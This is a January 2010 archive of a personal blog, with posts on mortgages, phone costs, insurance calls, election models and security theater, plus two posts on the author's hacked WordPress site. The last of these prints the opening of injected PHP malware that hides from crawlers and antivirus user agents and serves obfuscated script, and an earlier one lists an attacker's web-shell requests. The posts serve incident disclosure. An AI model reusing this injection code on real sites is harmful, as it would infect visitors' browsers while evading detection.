Monthly Archives: January 2010

Sphere of Deviance

1 Reply

Bill Tozier drew my attention to a most excellent term of art, Daniel C. Hallin’s phrase Sphere of Deviance.  That posting has the nice insight that Jon Steward makes his living in the border lands were legitimate controversy meets the deviance.

Hillard was mapping the world of national discourse, i.e. old school journalism, during the period when the consensus about Vietnam war imploded.   But this framework is universally applicable.  For example Open Source, as a tool for enterprise software development has traveled over the last decade all the way into the center.   Freudian analysis has travel out.  Some ideas orbit the consensus like comets; i.e. the fetish for solving all problems with unregulated markets.

It’s fun to take a topic (peak oil, diets, business plans) and map the various ideas and players along with their trajectories onto that drawing.

For some reason this all reminds me of how the distant periphery of cities has always been where you find the real nut case cults hanging out.

What can’t go on won’t.

3 Replies

The New York Times has yet another piece on the question of walking away from underwater mortgages, this time an op-ed by Richard Thaler.  It finally references the excellent essay by Brent White on the current “norm asymmetry” between the mortgage holders and mortgage holders; i.e. one side ethics & roots while the other has only spreadsheets.  I wrote about that a while back.

These pieces all seem to presume that the underwater owners can continue to tread water.  That’s crazy talk.    These mortgages are fundamentally unsound.  A sound mortgage requires a few key elements.  It needs to be backed by appropriate collateral, and these aren’t.    It’s servicing must tap only a reasonable percentage of the holder’s income stream, and these don’t.  It needs to be reasonably liquid, i.e. that should the situation arise the mortgage holder can sell the instrument and/or the home owner can sell the house; and these aren’t liquid, not at all.

So what we have here is a standard bubble situation.  i.e. “What can’t go on won’t.”  Sooner or later these people will walk.  The only question is how much damage to their family’s economic status they take before they do.

I continue to think there is money to be made here.  An entrepreneurial opportunity: a business that facilitates the walk always.  At it’s core all it does is loan people money to fund their walking away; i.e. bit of legal cost, a lump sum to pay for rental deposits, maybe some moving expenses.  I wonder how many landlords are willing to let you put the 3 months rent worth of deposits on your credit card?

What I find fascinating about this idea is who it turns the question of borrower honor on it’s head.    For these walk-away enabling loans to work you need trust.  They are personal loans.  The business works because it accepts that you can trust somebody who walks away.  The business accepts that they are not dishonorable, but rather that they are pragmatic.  It works because by splitting the benefit of that pragmatism with them.  I love that.

Further I love that such a business would have to do what the bubble lenders failed to do.  It would actually need to know the customers.  If you wanted to set up such a business you’d need to have local knowledge of the customer’s actual situation.  You’d need to be able see through his lousy existing cash flow and recognize that if his income stream is stable and that as soon as his housing costs drop by a thousand dollars a month paying off this new loan is going to be straight forward.  Maybe you could hire all the loan officers who learned their trade in the years before the bubble.    Maybe this is business model to be sold to small banks where their local knowlege can be brought to bear.

I can’t quite capture it, but the key is in there someplace.  The original lenders didn’t bother to figure out who was trustworthy.  (They didn’t need to since they could offload the risk immediately.)    Now if somebody shows up willing to do that work they can profit from it.    Curiously, the longer an underwater home owner tread water the more you can trust him.

Update: I suspect this mortgage holder wasn’t actually living in there.

Turning Off The Land Line

3 Replies

I switched my home’s phones to a cell phone back in August.  This post outlines what I did.

For the old phone line I had what I think was the cheapest service available.  The service was maybe 17$/month, but the confusopoly charges ran the bill up to about $34/month.  So a years service was costing me abour $400 dollars.  In addition to that I was buying my long distance service from yet another vendor so my total phone cost was about $450/year along with about 14 transaction events to handle the billing.

What I did was by a two pieces of capital equipment, a used cell phone and a clever widget that bridges from the cell phone to the existing in house phone wiring.  That capital equipment cost me about $100 total.  I then switched the phone number to Page Plus Cellular.  Page Plus Cellular is a Mobile Virtual Network Operator, or MVNO.  It stands on the physical network of Verizon Cellular.    While MVNO is the technical term for this, most people just say “Prepaid.”

Cell phone minutes are cheap on Page Plus.  When I set this up they were six cents each (if you buy them in $80 batches), now they are four cents each.  I estimate that the annual cost for the minutes we use is about $250/year, e.g. ~ $20/month.  I have to top up the account four times a year; so there are 4 transactions to handle/year.

So in the first year I’ll save about a hundred dollars have ten fewer transactions.  In next year I’ll save $200.

I think the quality is great, we occasionally get lousy connections but so far i haven’t had one were I couldn’t blame the counter party’s cell phone.  I guess it could count as a feature that I can take the home phone with us when we travel.

But over all this just is not that big a savings.

I appreciate at there are other schemes that use your internet connection.  I didn’t go down that route for three reasons.  I’ve had a hard time getting dependable quality with internet phone.  I didn’t want to get the two services entangled with each other.  It’s not clear if it would have been cheaper without taking on significantly more risk and support costs for me.

Because this cell phone doesn’t move I could presumably buy my minutes from one of the more marginal physical cell phone companies (say Metro PCS).  Suprisingly they don’t offer something cheaper.  But if something cheaper comes along I switch after spending down my current basket of minutes.

Update Sept 2012: I think I’m spending about 5-10$ a month; but yeah we don’t use the land land much.

Ha!  This had not occured to me before.  If you use smart phone (even a very cheap one) you can install google voice on the smart phone and then have the phone route your international calls thru that; which is very cheap.

Cost Advantage

2 Replies

I don’t like what I just figured out.

Today’s mail included a scary looking letter from my health insurance company demanding that I immediately call about a billing matter. So I called. I typed in numerous long strings of digits (dates, account numbers, event numbers, letter numbers, zipcode) and then spent an hour listening the Blue Danube waltz and numerous alternating assurances that my call was important and that if I pressed one I could leave a message (but that didn’t work). Finally the agent came on the line and, you knew this was coming, had me repeat all those long strings of digits again and a few other facts. Then she asked what my call was about. I read the the letter to her. She then asked what the event was. (i.e. broken arm) She then asked where it happened. (school) And finally if there was any other insurance carrier they who might be involved. (no).

Ok. So what did I figure out? Can you see it?

Their cost for that call was about 12$. So for them they might as well send out the scary letter for every single claim over say 120$. Maybe they can catch the doctor claiming something that didn’t happen, maybe they can catch the chance to shift the cost to another insurance company. My cost. Well that depends on what you think my time is worth. And, feel free to add a bit for my pain and suffering. But they don’t care about that; and the only feed back loop that I might use to reduce this goes all the way to Washington.

This kind of robo-calling is only going to get worse. Most of their cost is the 3 minutes of labor their human agent expended – but really there was no need for a human on their end.

The insurance company will do this for every transaction. The credit card company will do it for every transaction that is the least bit interesting (large, out of town, etc.). The airline will do it on the off chance you might admit your not going to make the plane allowing them to resell the seat. etc. etc. In all these cases the cost for them is so very low and the cost to me … well who cares about that?

Economic Determinism

2 Replies

We all have various theories for what is drives elections.  For example: left v.s. right, race, social issues, economic issues, skilled campaigning, endorsements, slander, self-interest, get-out-the-vote, voter-suppression, candidate height, etc. etc.  In thinking about that it is critical to draw a distinction between what garners votes for a candidate, say his height, and how he votes once elected, say for environmental regulations.

As a practical matter if you want your guy elected it’s important to set aside the issues and focus entirely on the question of what will get him votes.

Let’s say you accept that.  So what do you do?  Well, you go find the literature and experts and extract from them the secret formula.  Wait.  Why would that formula be secret?  Certainly discovering that formula would be a central theme in political science?  So, I don’t think it is a secret.  But as usual it is a bit hard to find the formula in the face of so much noise.  Some of that noise comes from the disputation nature of scientific enquiry; the political scientists are always disputing the question and puzzling out who’s clueful and who’s not is often difficult.  Much of the noise comes from confusing the first distinction – lots and lots of people assume that you get elected because of where you stand on the issues.  Maybe that’s true (the formula would tell us), but I presume it’s not and so all explanations about elections based on issues are just noise.

This formula might look something like this.  P = a*x + b*y +c; where P is the percentage of the vote the incumbent gets.  And the various terms represent the answer to our original question; what are the drivers that garner votes.  Of course there could be dozens of terms, and it could be that the constants, a, b, c; vary substantially from one election and venue to another.  But, maybe not.

One school of thought about what drives elections is that it’s all about the economy.  In that case you give the incumbent some constant c; say 50% of the vote, you then select a measure x, say unemployment, multiply it times a, add them up and you’ve got your prediction.  If this model has high predictive power then you’d better work on x.  Everything else you work on is about issues and policy, it’s not about getting reelected.

Models like that are sometimes called “economic determinism.”  Andrew Gelman wrote a short post on economic determinism back in 2008 providing pointers to the political scientists who have worked on the question.

The first paper (pdf) I read is simple enough.  Bob Erikson fitted a somewhat more complex model P = a*x + b*n + c.  The economic metric x was how much per-person income had changed, weighting the recent past more than the more distant past.

Bob’s model fit his small sample (10 presidential elections) really really well.  He concluded that economic term was very potent.  A 1% change in income drove a 2.7% change in the vote.  But so was second term b*n.

The metric he selected for n is called NCE, or net candidate advantage. That’s based on a voter survey (the  National Election Study)  of how much the voters like/dislike the candidate.

Based on the table in his paper and my calculations on average 12% of the votes the  incumbent  gets are driven by economic issues, 6.2% was driven by the NCE, and only 2.5% was left unexplained.  So 12% is economics and 8.8% is other stuff.  While economics is not entirely deterministic it certainly sets up a powerful current your either swimming with or against.

I’ve not followed any of the other bread crumbs that Andrew tossed out in his posting.  I have some strong doubts about Bob’s model, in particular the last election mentioned is Reagan’s 2nd; and that puts the entire data set before the last three decades of Republican party shift to a highly disciplined far right party.  Further economic growth was largely positive thru that entire period, while since then it’s been flat for voters.

FYI – the US economy is in a recession.  The entire economy is running at about 80% of it’s potential.  You can see that 20% short fall in lots of statistics, labor participation, railroad freight, it’s all over the place.  Not a happy time for incumbents.

Blog Hack – a bit more info.

Leave a reply

The security team at my ISP (dreamhost) found yet more infection in my blog.  The appearance of a wordpress blog can vary by installing different themes.  In the directory of one of these themes they found a file containing tool for giving a remote user a shell prompt (there is a version of the script  here).  The theme in question is not a standard wordpress theme; it is a variant I wrote up a while back.  I used it for a while a long time ago.  Which means the URL to access this was obscure.

I only retain logs for a month.  But on Jan 13th  84.3.40.172 pulled it once; notably that visit didn’t include a user agent making me think it was only enqueuing me for futher work.
On the 14th    86.106.170.114 came to visit (his user agent string was “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5”) and he proceed to:

…php
…php?d=/home/<myusername>/enthusiasm.cozy.org/
…php?d=/home/<myusername>/enthusiasm.cozy.org/&ef=wp-settings.php&edit=1
…php?d=/home/<myusername>/enthusiasm.cozy.org/&ef=wp-settings.php&edit=1
…php?d=/home/<myusername>/enthusiasm.cozy.org/&e=wp-settings.php
…php?d=/home/<myusername>/
…php?d=/home/

I assume that last step was to check if other users on the server might happen to have left their directories unprotected.
My current somewhat baseless guess is that this has been infecting my installation since April of 2008.  So, it is not unlikely that I brought the infection with me when I moved to Dreamhost in Oct 2008.

Security Theater, now on Broadway

1 Reply

This piece was born as the sound track for a cartoon.  The company that pulled it together provides sound tracks.  Lots of over the top musical effects for your B movies.  None the less it’s fun.

I don’t like list songs.  But, now days when ever I hear a song based on a list I think about the password generating trick of using a list, say bpnpbw (Boston, Providence, New York, …); so maybe he’s revealing his password?

That monster with it’s smoke, chorus, strings, sweaty sexy rocker reminded me of the rule of thumb that it’s tacky to use white paint in an oil painting.  I bet there is a “tacky” list for every art form.

Ned Gully wrote a delightful bit recently on the puzzle of when to cheerfully let the vendor manipulate your inner animal.   I agree with his example. but still I can’t resist highlighting that he admits to being the vendor.  The vendor always thinks the customer should unleash his inner animal.

A while back the Times has an article about manipulative consumer research used to design of restaurant menus.  For example, always pull the family values cord: “Uncle Juan’s Haggas.”  Of course the article’s full of the same rhetotical dabs of white paint: “The company hired Gregg Rapp, a menu engineer and consultant who holds “menu boot camps” for restaurants around the country. He said he had been “taking dollar signs off menus for 25 years,”.”  Boot camps!

I think it was Bruce Schneier who invented the delightful term Security Theater to highlight how the TSA is a kind of performance art.   It gives the impression of security but little real security.  The TSA is thus to security as a Cheesecake Factory is to fine dinning; the Temple of Thebes decor not withstanding.

So I was all LOL on receipt of the rumor that a friend of one of my offspring, having graduated with a degree in theater, had gone to work at the Department of Homeland Security!  The mind boggles.  I’m hoping that we can look forward to a significant upgrade in the production values at the TSA.  Better lighting.  A thrilling sound track.  Costume design.  Now that we have Democrats in power it makes sense that we would get a good dose of arts funding into the mix.   If we accept Bruce’s diagnosis then we should demand a more artful experience, one that make us feel substantially safer than it does today.  Oh wait, what if the goal isn’t to make us feel safe?

Argh, Blog Hacked

6 Replies

This blog uses WordPress plus a very few plugins.  That’s built on PHP.  So, it’s just asking for trouble.

Today one of my many fans, i.e. my wife, noted that my RSS feed wasn’t working.  I’m a professional, so I provided the Guild’s standard response: “Works for me.”  Actually it wasn’t working for the desktop blog reading software she uses, while it was working for my desktop blog reader.  Finally run the RSS validator on it which announces there is a <script> tag in the feed.  Eh, what!  I don’t see that doing view source in my browser.  Hm.

Finally I pull the feed with curl and that version has the problem.  Prepended on the RSS feed is a script that while compressed and obfuscated.  The obfuscation means it’s got lot of unique tokens in it, i.e. CeHxprJ, lJeVYuCF, UYwXC, and google finds a copy of the script here: http://pastebay.com/82974  but, that link has disappeared, presumably because that paste bot has a setting that will discard postings after 24 hours.

The infection in my blog was in wp-settings.php.  A second <php> block had been inserted at the front of the file.  That injected the script into every page, not just the RSS feed.  Here’s the start of that code.  As you can see it isn’t injected into every page; only certain browsers and then only if there aren’t any cookies yet.  That explains why I didn’t see it in my browser and I assume how “generous in what they accept” RSS readers explains why which people were getting my posts.

<?php
@ob_start();
@error_reporting(0);
if(!preg_match('/googlebot|bot|yahoo|slurp|msnbot|slurp|spider|malware|virus|checker|baidu|wordpress|verifier|robot|scanner|nutch|antivir|mcafee|zeus|tracker|abuse|blacklist|zeus|norton/i', $_SERVER['HTTP_USER_AGENT']) && strlen($_SERVER['HTTP_USER_AGENT'])>5 && sizeof($_COOKIE)==0) {
print "<script>function CeHxprJ(){if (navigator.userAgent.indexOf(\"MSIE\")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(CeHxprJ()>100000){function anrLazGcj(tLJVMwsZte){ alert('lJeVYuCF'); }  etc


I removed it.  All the rest of the php files had md5 checksums that match the distribution of wordpress 2.9.1.  Of course I am, presumably, still  vulnerable  to what ever infected the blog to begin with.

Bleck.